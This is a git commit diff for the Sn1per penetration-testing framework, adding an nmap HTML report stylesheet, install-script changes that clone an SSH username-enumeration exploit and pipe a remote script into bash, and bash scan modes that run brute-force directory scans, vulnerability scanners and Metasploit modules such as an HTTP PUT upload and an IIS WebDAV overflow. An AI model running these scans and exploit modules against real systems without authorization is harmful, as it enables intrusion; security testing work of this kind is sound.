Sn1per Community Edition by @xer0dayz - https://xerosecurity.com

This commit is contained in:
WP Engine Marketing 2018-10-24 14:04:25 -07:00
parent 6742318697
commit 82f6bb3599
26 changed files with 12805 additions and 682 deletions

View File

@ -1,4 +1,10 @@
## CHANGELOG:
* v5.7 - Added libSSH auth bypass scanner CVE-2018-10933
* v5.7 - Added HTTP PUT method RCE MSF exploit
* v5.7 - Added sniper.conf scan configuration file to customize sniper environments by user
* v5.7 - Added modular scan mode source files
* v5.7 - Updated wordlists for improved performance and results
* v5.7 - Fixed issue with DNScan using an invalid path
* v5.6 - Changed automatic report generation to "ON" for Sn1per Pro users
* v5.5 - Added new multi-threaded high speed "flyover" mode added
* v5.5 - Added new scan status mode via (sniper --status) command

View File

@ -1,2 +1,2 @@
## LICENSE:
Sn1per Community Edition is free to distribute, modify and use with the condition that credit is provided to the creator (1N3@CrowdShield) and is not for commercial or professional use. For commercia and professional use, a Sn1per Professional license must be purchased.
Sn1per Community Edition is free to distribute, modify and use with the condition that credit is provided to the creator (@xer0dayz) and @XeroSecurity and is not for commercial use. For commercial and professional use, a Sn1per Professional license must be purchased at https://xerosecurity.com.

281
bin/nmap-bootstrap.xsl Normal file
View File

@ -0,0 +1,281 @@
<?xml version="1.0" encoding="utf-8"?>
<!--
Nmap Bootstrap XSL
Creative Commons BY-SA
Andreas Hontzia (@honze_net)
-->
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="html" encoding="utf-8" indent="yes" doctype-system="about:legacy-compat"/>
<xsl:template match="/">
<html lang="en">
<head>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous"/>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap-theme.min.css" integrity="sha384-rHyoN1iRsVXV4nD0JutlnGaslCJuC7uwjduW9SVrLvRYooPp2bWYgmgJQIXwl/Sp" crossorigin="anonymous"/>
<link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/1.10.19/css/dataTables.bootstrap.min.css"/>
<script src="https://code.jquery.com/jquery-3.3.1.js"></script>
<script src="https://cdn.datatables.net/1.10.19/js/jquery.dataTables.min.js"></script>
<script src="https://cdn.datatables.net/1.10.19/js/dataTables.bootstrap.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<style>
.target:before {
content: "";
display: block;
height: 50px;
margin: -20px 0 0;
}
@media only screen and (min-width:1900px) {
.container {
width: 1800px;
}
}
.footer {
margin-top:60px;
padding-top:60px;
width: 100%;
height: 180px;
background-color: #f5f5f5;
}
</style>
<title>Scan Report Nmap <xsl:value-of select="/nmaprun/@version"/></title>
</head>
<body>
<nav class="navbar navbar-default navbar-fixed-top">
<div class="container-fluid">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="#"><span class="glyphicon glyphicon-home"></span></a>
</div>
<div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
<ul class="nav navbar-nav">
<li><a href="#scannedhosts">Scanned Hosts</a></li>
<li><a href="#onlinehosts">Online Hosts</a></li>
<li><a href="#openservices">Open Services</a></li>
</ul>
</div>
</div>
</nav>
<div class="container">
<div class="jumbotron">
<h1>Scan Report<br/><small>Nmap <xsl:value-of select="/nmaprun/@version"/></small></h1>
<pre style="white-space:pre-wrap; word-wrap:break-word;"><xsl:value-of select="/nmaprun/@args"/></pre>
<p class="lead">
<xsl:value-of select="/nmaprun/@startstr"/> <xsl:value-of select="/nmaprun/runstats/finished/@timestr"/><br/>
<xsl:value-of select="/nmaprun/runstats/hosts/@total"/> hosts scanned.
<xsl:value-of select="/nmaprun/runstats/hosts/@up"/> hosts up.
<xsl:value-of select="/nmaprun/runstats/hosts/@down"/> hosts down.
</p>
<div class="progress">
<div class="progress-bar progress-bar-success" style="width: 0%">
<xsl:attribute name="style">width:<xsl:value-of select="/nmaprun/runstats/hosts/@up div /nmaprun/runstats/hosts/@total * 100"/>%;</xsl:attribute>
<xsl:value-of select="/nmaprun/runstats/hosts/@up"/>
<span class="sr-only"></span>
</div>
<div class="progress-bar progress-bar-danger" style="width: 0%">
<xsl:attribute name="style">width:<xsl:value-of select="/nmaprun/runstats/hosts/@down div /nmaprun/runstats/hosts/@total * 100"/>%;</xsl:attribute>
<xsl:value-of select="/nmaprun/runstats/hosts/@down"/>
<span class="sr-only"></span>
</div>
</div>
</div>
<h2 id="scannedhosts" class="target">Scanned Hosts<xsl:if test="/nmaprun/runstats/hosts/@down > 1024"><small> (offline hosts are hidden)</small></xsl:if></h2>
<div class="table-responsive">
<table id="table-overview" class="table table-striped dataTable" role="grid">
<thead>
<tr>
<th>State</th>
<th>Address</th>
<th>Hostname</th>
<th>TCP (open)</th>
<th>UDP (open)</th>
</tr>
</thead>
<tbody>
<xsl:choose>
<xsl:when test="/nmaprun/runstats/hosts/@down > 1024">
<xsl:for-each select="/nmaprun/host[status/@state='up']">
<tr>
<td><span class="label label-danger"><xsl:if test="status/@state='up'"><xsl:attribute name="class">label label-success</xsl:attribute></xsl:if><xsl:value-of select="status/@state"/></span></td>
<td><xsl:value-of select="address/@addr"/></td>
<td><xsl:value-of select="hostnames/hostname/@name"/></td>
<td><xsl:value-of select="count(ports/port[state/@state='open' and @protocol='tcp'])"/></td>
<td><xsl:value-of select="count(ports/port[state/@state='open' and @protocol='udp'])"/></td>
</tr>
</xsl:for-each>
</xsl:when>
<xsl:otherwise>
<xsl:for-each select="/nmaprun/host">
<tr>
<td><span class="label label-danger"><xsl:if test="status/@state='up'"><xsl:attribute name="class">label label-success</xsl:attribute></xsl:if><xsl:value-of select="status/@state"/></span></td>
<td><xsl:value-of select="address/@addr"/></td>
<td><xsl:value-of select="hostnames/hostname/@name"/></td>
<td><xsl:value-of select="count(ports/port[state/@state='open' and @protocol='tcp'])"/></td>
<td><xsl:value-of select="count(ports/port[state/@state='open' and @protocol='udp'])"/></td>
</tr>
</xsl:for-each>
</xsl:otherwise>
</xsl:choose>
</tbody>
</table>
</div>
<script>
$(document).ready(function() {
$('#table-overview').DataTable();
});
</script>
<h2 id="onlinehosts" class="target">Online Hosts</h2>
<xsl:for-each select="/nmaprun/host[status/@state='up']">
<div class="panel panel-default">
<div class="panel-heading">
<h3 class="panel-title"><xsl:value-of select="address/@addr"/><xsl:if test="count(hostnames/hostname) > 0"> - <xsl:value-of select="hostnames/hostname/@name"/></xsl:if></h3>
</div>
<div class="panel-body">
<xsl:if test="count(hostnames/hostname) > 0">
<h4>Hostnames</h4>
<ul>
<xsl:for-each select="hostnames/hostname">
<li><xsl:value-of select="@name"/> (<xsl:value-of select="@type"/>)</li>
</xsl:for-each>
</ul>
</xsl:if>
<h4>Ports</h4>
<div class="table-responsive">
<table class="table table-bordered">
<thead>
<tr>
<th>Port</th>
<th>Protocol</th>
<th>State<br/>Reason</th>
<th>Service</th>
<th>Product</th>
<th>Version</th>
<th>Extra Info</th>
</tr>
</thead>
<tbody>
<xsl:for-each select="ports/port">
<xsl:choose>
<xsl:when test="state/@state = 'open'">
<tr class="success">
<td title="Port"><xsl:value-of select="@portid"/></td>
<td title="Protocol"><xsl:value-of select="@protocol"/></td>
<td title="State / Reason"><xsl:value-of select="state/@state"/><br/><xsl:value-of select="state/@reason"/></td>
<td title="Service"><xsl:value-of select="service/@name"/></td>
<td title="Product"><xsl:value-of select="service/@product"/></td>
<td title="Version"><xsl:value-of select="service/@version"/></td>
<td title="Extra Info"><xsl:value-of select="service/@extrainfo"/></td>
</tr>
<tr>
<td colspan="7">
<a><xsl:attribute name="href">https://nvd.nist.gov/vuln/search/results?form_type=Advanced&amp;cves=on&amp;cpe_version=<xsl:value-of select="service/cpe"/></xsl:attribute><xsl:value-of select="service/cpe"/></a>
<xsl:for-each select="script">
<h5><xsl:value-of select="@id"/></h5>
<pre style="white-space:pre-wrap; word-wrap:break-word;"><xsl:value-of select="@output"/></pre>
</xsl:for-each>
</td>
</tr>
</xsl:when>
<xsl:when test="state/@state = 'filtered'">
<tr class="warning">
<td><xsl:value-of select="@portid"/></td>
<td><xsl:value-of select="@protocol"/></td>
<td><xsl:value-of select="state/@state"/><br/><xsl:value-of select="state/@reason"/></td>
<td><xsl:value-of select="service/@name"/></td>
<td><xsl:value-of select="service/@product"/></td>
<td><xsl:value-of select="service/@version"/></td>
<td><xsl:value-of select="service/@extrainfo"/></td>
</tr>
</xsl:when>
<xsl:when test="state/@state = 'closed'">
<tr class="active">
<td><xsl:value-of select="@portid"/></td>
<td><xsl:value-of select="@protocol"/></td>
<td><xsl:value-of select="state/@state"/><br/><xsl:value-of select="state/@reason"/></td>
<td><xsl:value-of select="service/@name"/></td>
<td><xsl:value-of select="service/@product"/></td>
<td><xsl:value-of select="service/@version"/></td>
<td><xsl:value-of select="service/@extrainfo"/></td>
</tr>
</xsl:when>
<xsl:otherwise>
<tr class="info">
<td><xsl:value-of select="@portid"/></td>
<td><xsl:value-of select="@protocol"/></td>
<td><xsl:value-of select="state/@state"/><br/><xsl:value-of select="state/@reason"/></td>
<td><xsl:value-of select="service/@name"/></td>
<td><xsl:value-of select="service/@product"/></td>
<td><xsl:value-of select="service/@version"/></td>
<td><xsl:value-of select="service/@extrainfo"/></td>
</tr>
</xsl:otherwise>
</xsl:choose>
</xsl:for-each>
</tbody>
</table>
</div>
<xsl:if test="count(hostscript/script) > 0">
<h4>Host Script</h4>
</xsl:if>
<xsl:for-each select="hostscript/script">
<h5><xsl:value-of select="@id"/></h5>
<pre style="white-space:pre-wrap; word-wrap:break-word;"><xsl:value-of select="@output"/></pre>
</xsl:for-each>
</div>
</div>
</xsl:for-each>
<h2 id="openservices" class="target">Open Services</h2>
<div class="table-responsive">
<table id="table-services" class="table table-striped dataTable" role="grid">
<thead>
<tr>
<th>Address</th>
<th>Port</th>
<th>Protocol</th>
<th>Service</th>
<th>Product</th>
<th>Version</th>
<th>CPE</th>
<th>Extra info</th>
</tr>
</thead>
<tbody>
<xsl:for-each select="/nmaprun/host">
<xsl:for-each select="ports/port[state/@state='open']">
<tr>
<td><xsl:value-of select="../../address/@addr"/><xsl:if test="count(../../hostnames/hostname) > 0"> - <xsl:value-of select="../../hostnames/hostname/@name"/></xsl:if></td>
<td><xsl:value-of select="@portid"/></td>
<td><xsl:value-of select="@protocol"/></td>
<td><xsl:value-of select="service/@name"/></td>
<td><xsl:value-of select="service/@product"/></td>
<td><xsl:value-of select="service/@version"/></td>
<td><xsl:value-of select="service/cpe"/></td>
<td><xsl:value-of select="service/@extrainfo"/></td>
</tr>
</xsl:for-each>
</xsl:for-each>
</tbody>
</table>
</div>
<script>
$(document).ready(function() {
$('#table-services').DataTable();
});
</script>
</div>
<footer class="footer">
<div class="container">
<p class="text-muted">
This report was generated with <a href="https://github.com/honze-net/nmap-bootstrap-xsl">Nmap Bootstrap XSL</a>.<br/>
Licensed under <a href="https://creativecommons.org/licenses/by-sa/4.0/">Creative Commons BY-SA</a>.<br/>
Designed and built by Andreas Hontzia (<a href="https://www.twitter.com/honze_net">@honze_net</a>).<br/>
</p>
</div>
</footer>
</body>
</html>
</xsl:template>
</xsl:stylesheet>

View File

@ -1,6 +1,6 @@
#!/bin/bash
# Install script for sn1per
#
# Install script for Sn1per
# Crated by @xer0dayz - https://xerosecurity.com
OKBLUE='\033[94m'
OKRED='\033[91m'
@ -15,7 +15,7 @@ echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[http://xerosecurity.com$RESET"
echo -e "$OKORANGE + -- --=[https://xerosecurity.com$RESET"
echo ""
INSTALL_DIR=/usr/share/sniper
@ -38,7 +38,7 @@ cp -Rf * $INSTALL_DIR 2> /dev/null
cd $INSTALL_DIR
echo -e "$OKORANGE + -- --=[Installing package dependencies...$RESET"
apt-get install nfs-common eyewitness nodejs wafw00f xdg-utils metagoofil clusterd ruby rubygems python dos2unix zenmap sslyze arachni aha libxml2-utils rpcbind uniscan xprobe2 cutycapt host whois dirb dnsrecon curl nmap php php-curl hydra iceweasel wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap jq golang adb
apt-get install nfs-common eyewitness nodejs wafw00f xdg-utils metagoofil clusterd ruby rubygems python dos2unix zenmap sslyze arachni aha libxml2-utils rpcbind uniscan xprobe2 cutycapt host whois dirb dnsrecon curl nmap php php-curl hydra iceweasel wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap jq golang adb xsltproc
apt-get install waffit 2> /dev/null
pip install dnspython colorama tldextract urllib3 ipaddress requests
curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.33.8/install.sh | bash
@ -79,8 +79,10 @@ git clone https://github.com/1N3/jexboss.git
git clone https://github.com/maurosoria/dirsearch.git
git clone https://github.com/jekyc/wig.git
git clone https://github.com/rbsec/dnscan.git
git clone https://github.com/Rhynorater/CVE-2018-15473-Exploit.git ssh-enum
pip3 install -r $PLUGINS_DIR/dnscan/requirements.txt
git clone https://github.com/Rhynorater/CVE-2018-15473-Exploit.git ssh-enum
git clone https://github.com/leapsecurity/libssh-scanner.git
pip install -r $PLUGINS_DIR/libssh-scanner/requirements.txt
mv $INSTALL_DIR/bin/slurp.zip $PLUGINS_DIR
unzip slurp.zip
rm -f slurp.zip

View File

@ -74,59 +74,3 @@ if [ "$MODE" = "airstrike" ]; then
fi
exit
fi
# FULLPORTONLY MODE
if [ "$MODE" = "fullportonly" ]; then
if [ "$REPORT" = "1" ]; then
args="-t $TARGET"
if [ ! -z "$WORKSPACE" ]; then
args="$args -w $WORKSPACE"
LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $LOOT_DIR 2> /dev/null
mkdir $LOOT_DIR/domains 2> /dev/null
mkdir $LOOT_DIR/screenshots 2> /dev/null
mkdir $LOOT_DIR/nmap 2> /dev/null
mkdir $LOOT_DIR/notes 2> /dev/null
mkdir $LOOT_DIR/reports 2> /dev/null
mkdir $LOOT_DIR/scans 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
fi
args="$args --noreport -m fullportonly"
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
exit
fi
logo
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
if [ -z "$PORT" ]; then
nmap -Pn -A -v -T4 -p$DEFAULT_TCP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -Pn -sU -A -T4 -v -p$DEFAULT_UDP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-udp.xml
else
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -Pn -A -v -T4 -p $PORT $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -Pn -A -v -T4 -sU -p $PORT -Pn $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml >> $LOOT_DIR/nmap/nmap-$TARGET.txt
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED DONE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
loot
exit
fi
if [ "$MODE" = "port" ]; then
if [ -z "$PORT" ]; then
echo -e "$OKRED + -- --=[Error: You need to enter a port number. $RESET"
exit
fi
fi

View File

@ -14,13 +14,14 @@ if [ "$MODE" = "discover" ]; then
mkdir $LOOT_DIR/output 2> /dev/null
mkdir $LOOT_DIR/scans 2> /dev/null
fi
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
OUT_FILE=$(echo "$TARGET" | tr / -)
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$OUTFILE-$MODE.txt 2> /dev/null
sniper -t $TARGET -m $MODE --noreport $args | tee $LOOT_DIR/output/sniper-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
exit
fi
echo -e "$OKRED ____ /\\"
echo -e "$OKRED Sn1per by 1N3 @CrowdShield \ \\"
echo -e "$OKRED https://xerosecurity.com \ \\"
echo -e "$OKRED https://xerosecurity.com \ \\"
echo -e "$OKRED ___ / \\"
echo -e "$OKRED \ \\"
echo -e "$OKRED === > [ \\"
@ -52,9 +53,10 @@ if [ "$MODE" = "discover" ]; then
cat $LOOT_DIR/domains/sniper-$OUT_FILE-ips.txt
echo ""
echo -e "$OKRED[+]$RESET Target list saved to $LOOT_DIR/domains/sniper-$OUT_FILE-ips.txt "
echo -e "$OKRED[i] To scan all IP's, use sniper -f $LOOT_DIR/domains/sniper-$OUT_FILE-ips.txt -m airstrike or nuke modes. $RESET"
echo -e "$OKRED[i] To scan all IP's, use sniper -f $LOOT_DIR/domains/sniper-$OUT_FILE-ips.txt -m flyover, airstrike or nuke modes. $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED SCAN COMPLETE! $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
loot
exit
fi

View File

@ -52,6 +52,9 @@ if [ "$MODE" = "flyover" ]; then
i=1
for HOST in `sort -u $FILE`; do
TARGET="$HOST"
touch $LOOT_DIR/scans/$TARGET-$MODE.txt 2> /dev/null
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
echo -e "$OKRED=====================================================================================$RESET"
echo -e "${OKBLUE}HOST:$RESET $TARGET"
@ -59,15 +62,15 @@ if [ "$MODE" = "flyover" ]; then
dig all +short $TARGET 2> /dev/null > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null &
dig all +short -x $TARGET 2> /dev/null >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null &
wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' > $LOOT_DIR/web/title-https-$TARGET.txt & 2> /dev/null
wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' > $LOOT_DIR/web/title-https-$TARGET.txt & 2> /dev/null
wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' 2> /dev/null > $LOOT_DIR/web/title-https-$TARGET.txt & 2> /dev/null
wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' 2> /dev/null > $LOOT_DIR/web/title-https-$TARGET.txt & 2> /dev/null
curl --connect-timeout 3 -I -s -R http://$TARGET > $LOOT_DIR/web/headers-http-$TARGET.txt & 2> /dev/null
curl --connect-timeout 3 -I -s -R https://$TARGET > $LOOT_DIR/web/headers-https-$TARGET.txt & 2> /dev/null
curl --connect-timeout 3 -I -s -R http://$TARGET 2> /dev/null > $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null &
curl --connect-timeout 3 -I -s -R https://$TARGET 2> /dev/null > $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null &
nmap -sS -T5 --open -Pn -p $QUICK_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null &
cat $LOOT_DIR/nmap/dns-$TARGET.txt | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" 2>/dev/null | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null & 2> /dev/null
cat $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" 2>/dev/null | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null & 2> /dev/null
if [ ${DISTRO} == "blackarch" ]; then
/bin/CutyCapt --url=http://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=1000 2> /dev/null &
@ -92,6 +95,7 @@ if [ "$MODE" = "flyover" ]; then
if [ "$LOOT" = "1" ]; then
loot
exit
else
for HOST in `sort -u $LOOT_DIR/domains/domains-all-sorted.txt $LOOT_DIR/domains/targets-all-sorted.txt`; do
TARGET="$HOST"
@ -110,6 +114,5 @@ if [ "$MODE" = "flyover" ]; then
echo ""
done
fi
exit
fi

57
modes/fullportonly.sh Normal file
View File

@ -0,0 +1,57 @@
# FULLPORTONLY MODE
if [ "$MODE" = "fullportonly" ]; then
if [ "$REPORT" = "1" ]; then
args="-t $TARGET"
if [ ! -z "$WORKSPACE" ]; then
args="$args -w $WORKSPACE"
LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $LOOT_DIR 2> /dev/null
mkdir $LOOT_DIR/domains 2> /dev/null
mkdir $LOOT_DIR/screenshots 2> /dev/null
mkdir $LOOT_DIR/nmap 2> /dev/null
mkdir $LOOT_DIR/notes 2> /dev/null
mkdir $LOOT_DIR/reports 2> /dev/null
mkdir $LOOT_DIR/scans 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
fi
args="$args --noreport -m fullportonly"
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-fullnmapscan.txt
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
exit
fi
logo
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
if [ -z "$PORT" ]; then
nmap -Pn -A -v -T4 -p$DEFAULT_TCP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -Pn -sU -A -T4 -v -p$DEFAULT_UDP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-udp.xml
else
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -Pn -A -v -T4 -p $PORT $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -Pn -A -v -T4 -sU -p $PORT -Pn $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml >> $LOOT_DIR/nmap/nmap-$TARGET.txt
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED DONE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
loot
exit
fi
if [ "$MODE" = "port" ]; then
if [ -z "$PORT" ]; then
echo -e "$OKRED + -- --=[Error: You need to enter a port number. $RESET"
exit
fi
fi

File diff suppressed because it is too large Load Diff

136
modes/normal_webporthttp.sh Normal file
View File

@ -0,0 +1,136 @@
if [ "$MODE" = "web" ];
then
if [ "$PASSIVE_SPIDER" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | sort -u | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
fi
if [ "$BLACKWIDOW" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
blackwidow -u http://$TARGET -l 3 -s y -v y
cat /usr/share/blackwidow/$TARGET*/* > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_INSANE -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
wget http://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-http.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING NMAP HTTP SCRIPTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -A -Pn -T5 -p 80 -sV --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd -i $TARGET 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wpscan --url http://$TARGET --batch --disable-tls-checks
echo ""
wpscan --url http://$TARGET/wordpress/ --batch --disable-tls-checks
echo ""
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING CMSMAP $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $CMSMAP -t http://$TARGET
echo ""
python $CMSMAP -t http://$TARGET/wordpress/
echo ""
if [ "$NIKTO" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nikto -h http://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-http.txt
fi
cd $INSTALL_DIR
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "80"; setg SSL false; run; set PATH /uploads/; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "80"; setg SSL false; run; use scanner/http/webdav_website_content; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
